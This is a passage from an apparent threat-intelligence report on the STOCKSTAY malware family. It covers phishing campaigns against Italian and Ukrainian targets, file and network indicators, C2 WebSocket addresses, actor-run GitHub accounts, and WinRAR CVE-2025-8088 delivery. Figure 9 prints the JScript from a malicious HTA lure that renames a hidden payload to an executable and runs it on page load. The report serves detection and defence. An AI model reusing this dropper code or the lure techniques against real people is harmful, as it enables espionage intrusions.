        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig7.max-1000x1000.png" alt="Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ugoq7">Figure 7: Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Although inconclusive, this appears to indicate an intention to deploy STOCKSTAY against Italian-speaking individuals or organizations, specifically with a focus on foreign affairs.</span></p>
<p><span>In following with previous STOCKSTAY instances, this sample utilized environmental keying for its configuration file. GTIG was able to recover the domain name used to decrypt the configuration file in order to identify the WebSocket C2 address </span><code>wss://wool-basalt-clock.glitch.me/ws</code><span>. This matches the C2 address used in January 2024.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>Copia.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>b064a3efb04ed77e6c57955089ce639e193d166c8ea2216c98c3e9b701ea2cff</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>249a4c7cacdd8e99a2a089a5c0ce904f2eff22e0e40fcfb10f7824dca6c51ecb</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketSystem.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>b728eba4f0d6d16602fbad05a591f14391594262d3584b2e249e97f86e4dcc5a</code></p>
</td>
</tr>
<tr>
<td>
<p><code>default.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>40b1208dda0cd5dd95c6b57764b2cfe7145b3ed9457f498408b4aaa05bf3ef50</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 10: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php</code></p>
</td>
<td>
<p><span>Italian language lure relating to voting on matters related to the Italian Ministry of Foreign Affairs.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://wool-basalt-clock.glitch.me/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 11: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>March 18 – April 3, 2025: Ukraine</span></h4>
<p><span>On April 2, 2025, GTIG identified a compromised email account sending a phishing email containing a message purporting to originate from a Ukrainian university, relating to the testing of a new distance learning environment. The threat actor attached a malicious Remote Desktop Protocol (RDP) file to the email, which upon opening resulted in a connection being established between the victim and an open RDP port (3389) hosted on the actor-registered domain chosen to imitate the same academic institution. </span></p>
<p><span>Once the victim connected to the actor's infrastructure, GTIG observed the actor deploying STOCKSTAY.MARKETMAKER to the client. STOCKSTAY.MARKETMAKER was configured to download a ZIP containing STOCKSTAY from a legitimate but compromised website belonging to the State Regulatory Service of Ukraine. In contrast to the majority of earlier observations, the configuration file observed during this operation was protected with a hard-coded password. This appears to correspond with this particular operation’s focus on initial access to a victim’s environment via spear-phishing, through which the specific domain or host name may not be known to the threat actor, and thus cannot be used for environmental keying. GTIG was able to identify the malware using the WebSocket C2 URL </span><code>wss://weatherdataai.theworkpc.com/ws</code><span>.</span></p>
<p><span>According to the metadata associated with the ZIP archive downloaded by STOCKSTAY.MARKETMAKER, the core STOCKSTAY components used during this operation were last modified between March 18 – 26, with the configuration file last being modified on March <span>31</span>.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>MicrosoftUpdateOneDrive.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.MARKETMAKER Downloader</span></p>
</td>
<td>
<p><code>da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40</code></p>
</td>
</tr>
<tr>
<td>
<p><code>docs.zip</code></p>
</td>
<td>
<p><span>ZIP archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>9fe944147c15a87963b06baf6473288d64c23655a0ba9369c35566272d8efc73</code></p>
</td>
</tr>
<tr>
<td>
<p><code>SMEditor.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>e1d16fb635060d23e889b0617d77f0cf06d00cc19b43a2c8b5ac53ac027ac722</code></p>
</td>
</tr>
<tr>
<td>
<p><code>SMNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 12: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://www.drs.gov.ua/wp-content/themes/twentytwentyfive/docs.zip</code></p>
</td>
<td>
<p><span>Compromised State Regulatory Service of Ukraine infrastructure serving ZIP archive containing STOCKSTAY components</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://weatherdataai.theworkpc.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 13: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>May 14, 2025: Poland</span></h4>
<p><span>GTIG identified two samples of STOCKSTAY.STOCKBROKER being uploaded to VirusTotal on May </span>14, 2025 from Poland. </p>
<p><span>The first sample, named “ClientMNGR2.exe”, matched previously observed versions, however the second sample, named “GR3.exe”, was heavily obfuscated using large quantities of junk code, and a previously unknown string obfuscation mechanism. GTIG tracks this obfuscation mechanism as K1MORPHER, and we have since observed its inclusion in all core STOCKSTAY components, and within select samples of KAZUAR; increasing our confidence that STOCKSTAY exists within the same development ecosystem as other malware leveraged by Turla.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR2.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER</span></p>
</td>
<td>
<p><code>d3fd32f915c239872c9e7ed9408b1f36dfcef03aa68f9a396d05c437667cdb43</code></p>
</td>
</tr>
<tr>
<td>
<p><code>GR3.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER</span></p>
</td>
<td>
<p><code>98ce3c6e4dd05887ea619f2bbfeb2e2c2805ed07e85e119b79b828b7ef8be397</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 14: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>May 28 – August 8, 2025: Ukraine </span><span>— </span><span>Deployment via Malicious HTA</span></h4>
<p><span>On August 8, 2025, GTIG identified a RAR archive, “calculator.rar”, being submitted to VirusTotal. The archive had been hosted on compromised infrastructure belonging to a Ukrainian IT company since at least July 22, 2025. The archive contained a malicious HTA file named “Калькулятор грошового забезпечення військовослужбовців 2025.hta” (translation: "Military personnel cash benefit calculator 2025.hta"). The HTA was designed to execute a variant of the STOCKSTAY.MARKETMAKER downloader, which was also included in the archive, using the code shown in Figure 9.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig8.max-1000x1000.png" alt="Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="j8j2f">Figure 8: Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;script language="JScript"&gt;
  function renameAndRunFile() {
    try {
      var oldName = "calculator_2025_files\\styles.dat";
      var newName = "calculator_2025_files\\styles.dat.exe";

      var fso = new ActiveXObject("Scripting.FileSystemObject");

      if (fso.FileExists(oldName)) {
        if (fso.FileExists(newName)) {
          fso.DeleteFile(newName);
        }
        fso.MoveFile(oldName, newName);

        var shell = new ActiveXObject("WScript.Shell");
        shell.Run('"' + newName + '"', 1, false);
      } else {
      }

    } catch (e) {
    }
  }

window.onload = function() {
  renameAndRunFile();
};
&lt;/script&gt;</code></pre>
<p><span><span>Figure 9: JavaScript code contained in Калькулятор грошового забезпечення військовослужбовців 2025.hta</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>The STOCKSTAY.MARKETMAKER variant retrieved a ZIP archive, “EditorToolsPdf.zip”, containing the core STOCKSTAY components from a second compromised server located in Ukraine, this time hosting the archive within a compromised WordPress instance. </span></p>
<p><span>Analysis of the modification timestamps within the military calculator lure archive show that this operation dated as far back as May <span>28,</span> 2025, when the majority of the contents of the “calculator_2025_files” folder were last modified. The STOCKSTAY.MARKETMAKER executable was last modified on June 5, 2025, and the malicious HTA file was modified on June 10, 2025. </span></p>
<p><span>Similar examination of the STOCKSTAY archive shows the configuration file being modified on June 4, 2025, while the archive itself was last modified on the compromised server on June 5, 2025. This series of events shows that the complete STOCKSTAY ZIP archive was staged on the compromised infrastructure while modifications were being made to the initial phishing lures.</span></p>
<p><span>GTIG has been able to confirm via a trusted third party that the original compromise of the Ukrainian server used to host the STOCKSTAY archive occurred on or before May <span>13,</span> 2025.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>calculator.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>6da0b4c1a5d0d3fb6e6a2990a82ba51db1f68a3bba818baa46526a29731e2342</code></p>
</td>
</tr>
<tr>
<td>
<p><code>Калькулятор грошового забезпечення військовослужбовців 2025.hta</code></p>
</td>
<td>
<p><span>HTA lure </span></p>
<p><span>(translated filename: “Military personnel cash benefit calculator 2025.hta”)</span></p>
</td>
<td>
<p><code>0d6b083208097d5b3e189891338540f6c64faaaaf268b0bb0b085dd53d5857b4</code></p>
</td>
</tr>
<tr>
<td>
<p><code>styles.dat.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.MARKETMAKER downloader</span></p>
</td>
<td>
<p><code>626330d22f77d9cbca9d40cc06568041703f194610c4c5a84bbb05a2e4ee7459</code></p>
</td>
</tr>
<tr>
<td>
<p><code>EditorToolsPdf.zip</code></p>
</td>
<td>
<p><span>ZIP archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>447f430b46fad5a3f8e8c5aad1f8f7f79af069489c3d9c29224bb9f14f0c7bf4</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ViewPdf.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ConverterDDSNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>55249f296b63a8bcf911b8bc96de43c1ac2b4a56c150a19d33d892a47e57352c</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>e3364ee21cae6725451e8bc9ab9933df0000fd19814170bd132da68d1906d5ff</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 15: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://basecon.com.ua/calculator.rar</code></p>
</td>
<td>
<p><span>RAR archive containing HTA lure and STOCKSTAY.MARKETMAKER downloader</span></p>
</td>
</tr>
<tr>
<td>
<p><code>https://online.zp.ua/wp-content/uploads/Tools/EditorToolsPdf.zip</code></p>
</td>
<td>
<p><span>Compromised WordPress infrastructure hosting STOCKSTAY ZIP archive</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://canal1zac1a.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 16: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>July 23 – 28, 2025: Actor Uses GitHub to Host STOCKSTAY MSI Files</span></h4>
<p><span>GTIG identified a GitHub account we suspect of being used by the threat actor to test or deploy STOCKSTAY. The GitHub account, </span><code>Roberto1983-ai</code><span>, was created on July <span>23,</span> 2025 at 12:01:03. </span></p>
<p><span>On July <span>24,</span> 2025, the account created a public repository named </span><code>msi_installer_test2</code><span>, into which a single file was uploaded: </span><code>DiplomacyEduAI.msi</code><span>. A second repository, this time named </span><code>msi_installer_test3</code><span>, was created by the same user on July 28, 2025, and subsequently populated with another version of </span><code>DiplomacyEduAI.msi</code><span>.</span></p>
<p><span>Both versions of </span><code>DiplomacyEduAI.msi</code><span> contained core STOCKSTAY components, alongside a configuration file containing the WebSocket C2 URL </span><code>wss://canal1zac1a.onrender.com/ws</code><span>. GTIG has been unable to identify any active operations using these specific MSI files.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>DiplomacyEduAI.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>19e6ed42248f9d03beb343a7c09a864dcd3cd671c29e1e5eac93579225224ac9</code></p>
</td>
</tr>
<tr>
<td>
<p><code>DiplomacyEduAI.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>6298f3150ad94a242e649886d47c59c634a4d04b9af5ee15e3bf335c40b5e58e</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ViewPdf.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ConverterDDSNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>d8fe8f3fe838d5b1a1043096f6f6bb6f524f5f1b0c9f83a081078a824daa0cf3</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>4e3bed10a8eff3e9205c1f37f647512464271d5ac65df7ae4709735621a38320</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 17: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://canal1zac1a.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 18: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>August 14, 2025: Actor Uses GitHub to Host STOCKSTAY Server Code</span></h4>
<p><span>GTIG identified a second GitHub account, which was observed hosting what we assess to be server-side code for handling STOCKSTAY C2 communications. The GitHub account, </span><code>ChikenFresh</code><span>, was created on August 14, 2025, then almost immediately created a public repository named </span><code>google-ai-labs-it</code><span>, into which the suspected C2 controller code was uploaded. Our analysis of the C2 controller is included in the malware analysis section earlier in this report.</span></p>
<p><span>The GitHub repository name corresponds with a STOCKSTAY C2 server identified running on the Render platform, however GTIG has not observed any active operations using this infrastructure. We assess that the threat actor linked this GitHub repository to their Render account in order to utilize their </span><a href="https://render.com/docs/websocket" rel="noopener" target="_blank"><span>WebSocket hosting</span></a><span> capabilities.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>server.py</code></p>
</td>
<td>
<p><span>Python STOCKSTAY C2 controller</span></p>
</td>
<td>
<p><code>f04f43b6f7c2d86109c495179b497f7fb45fd95816623de1b77900f71b4f99ed</code></p>
</td>
</tr>
<tr>
<td>
<p><code>models.py</code></p>
</td>
<td>
<p><span>Database table definitions and models for use by </span><code>server.py</code><span> </span></p>
</td>
<td>
<p><code>7615140f78d9a0ce31cc9fe8c54c60028a7439cb32526fd97b10afef7145dd78</code></p>
</td>
</tr>
<tr>
<td>
<p><code>wtools.py</code></p>
</td>
<td>
<p><span>Utility functions for use by </span><code>server.py</code></p>
</td>
<td>
<p><code>b55f3b8a7334af049ba3f70a9ad3fe78574b1e180c68baf9a7110d104387a636</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 19: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://google-ai-labs-it.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 20: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>November 2025: Ukraine — Drone-Related Lures and Deployment via CVE-2025-8088</span></h4>
<p><span>On November 6, 2025, GTIG identified a batch of phishing emails being sent from a drone-themed UKR.NET email account, to approximately 20 Ukraine-based targets, each containing a unique ukr.net file sharing link. Each link led to a malicious RAR archive which exploits a path traversal vulnerability in WinRAR (</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability"><span>CVE-2025-8088</span></a><span>) to install the core STOCKSTAY components. Continuations of this phishing activity were observed on November 12 and 14, 2025. We identified that only around 30% of the recipients of these phishing emails opened the emails, however we are unable to confirm how many of these individuals downloaded or executed the malicious payloads. All affected Google accounts were marked for additional authentication checks as a precautionary measure against potential account compromise. Google also notified affected users via our </span><a href="https://support.google.com/mail/answer/2591015" rel="noopener" target="_blank"><span>Government Backed Attack Warning</span></a><span> (GBAW) notifications.</span></p>
<p><span>GTIG identified two distinct types of Ukrainian-language decoy documents within the malicious RAR archives, both appearing to target Ukrainian military personnel. The first, “Донесення БпЛА 06.11.2025.docx” (“UAV report 06.11.2025.docx”), claimed to be “[A] Report on the availability/need for UAVs, their condition, the availability of crews for each UAV in the units, their training in the defense zone of the 1st Brigade as of 06.11.2025” (see Figure 10).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig10.max-1000x1000.png" alt="“Report” Decoy document from November 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9e24u">Figure 10: “Report” Decoy document from November 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The second decoy, observed as “Товари(докладніше).docx” (“Products (more details).docx”) and “Приклади товарів для листа (деталізовано).docx” (“Examples of products for the letter (detailed).docx”), predominantly comprised of an equipment list referencing: “Tactical medicine”; “Communication and surveillance equipment”; “Equipment and survival equipment”; and “Automotive property” (see Figure 11).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig11.max-1000x1000.png" alt="“Equipment List” Decoy document from November 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9e24u">Figure 11: “Equipment List” Decoy document from November 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Each of the decoy documents contained an external image reference that causes a connection to be made from the victim’s machine to a site likely monitored by the threat actor, signaling that the document has been opened. GTIG believes the URLs referenced by the decoy documents may be hosted on compromised infrastructure.</span></p>
<p><span>GTIG identified that the instances of STOCKSTAY observed being deployed during this operation contained enhancements intended to increase resistance to detection, specifically by carving out functionality into external modules. These external modules were named to imitate legitimate Windows libraries, using the filenames shown in Table 20.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Component</strong></p>
</td>
<td>
<p><strong>Filename</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><code>MSViewer.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>Shared STOCKSTAY core module</span></p>
</td>
<td>
<p><code>ms-lib-math-core.dll</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><code>MSDriver.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER core module</span></p>
</td>
<td>
<p><code>ms-api-wmcpdt.dll</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>MSRender.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER core module</span></p>
</td>
<td>
<p><code>ms-api-win-render.dll</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 21: STOCKSTAY component filenames observed in November 2025</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><p><span>GTIG observed two distinct STOCKSTAY WebSocket C2 URLs being used during this phishing wave. The majority of instances used the URL </span><code>wss://driverx86-adobe.onrender.com/ws</code><span>; however, we were able to identify at least one instance of STOCKSTAY using </span><code>wss://google-ai-labs-it.onrender.com/ws</code><span>, corresponding to the previously described GitHub repository associated with the </span><code>ChikenFresh</code><span> user.</span></p>
<p><span>Alongside the core STOCKSTAY components, the malicious RAR archives contained LNK files, described as “Updater Shortcut”, corresponding to each core STOCKSTAY component. The extraction file path was configured to attempt to deploy into the startup programs directory. </span></p>
<p><span>GTIG was able to identify that the actor began creating the LNK files for this operation approximately six hours prior to the first phishing emails being sent, with the Ukrainian-language lure documents being created around four hours prior.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>a40bf9c75d1bfa6d66f1179f2321de6589f80d3089d992797a9cb0e84f6196ce</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>e316b1e13154dc6115e1e0c023f6fe3d17861cae839d4a4a81779b6aad9a24f8</code></p>
</td>
